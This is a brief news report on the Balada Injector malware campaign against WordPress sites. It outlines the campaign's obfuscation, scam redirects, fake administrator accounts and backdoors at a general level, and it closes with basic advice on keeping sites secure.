More than a million WordPress sites infected with new malware

According to cybersecurity experts, more than a million WordPress-based websites have been infected as part of the Balada Injector malware campaign that has been going on since 2017. Such attacks are known to occur in waves — every few weeks.

«This campaign can be easily identified by the attackers' penchant for obfuscating (obfuscating or creating unreadable code) String. fromCharCode, using recently registered domain names with malicious scripts on random subdomains, and redirecting to various fraudulent sites,» experts say.

The sites used in the attacks include fake technical support, fraudulent lottery winnings, and fake CAPTCHAs that encourage users to enable notifications. This is how cybercriminals can send their spam ads. Over the past years, more than 100 domains have been used in the Balada Injector malware campaign.

The malware also allows to generate fake WordPress administrator users, collect data stored on the underlying hosts, and leave backdoors for constant access. In addition, Balada Injector is capable of performing large-scale searches in top-level directories associated with the compromised site’s file system.

«Most often, these resources belong to the creator of the compromised site, and they all use the same server account, as well as the same file access rights. Thus, hacking only one site can potentially provide access to several other sites at once,» cybersecurity experts say.

The experts recommended that WordPres users update the site software in time, remove unnecessary plugins and themes, and use strong WordPress administrator passwords to avoid being at risk.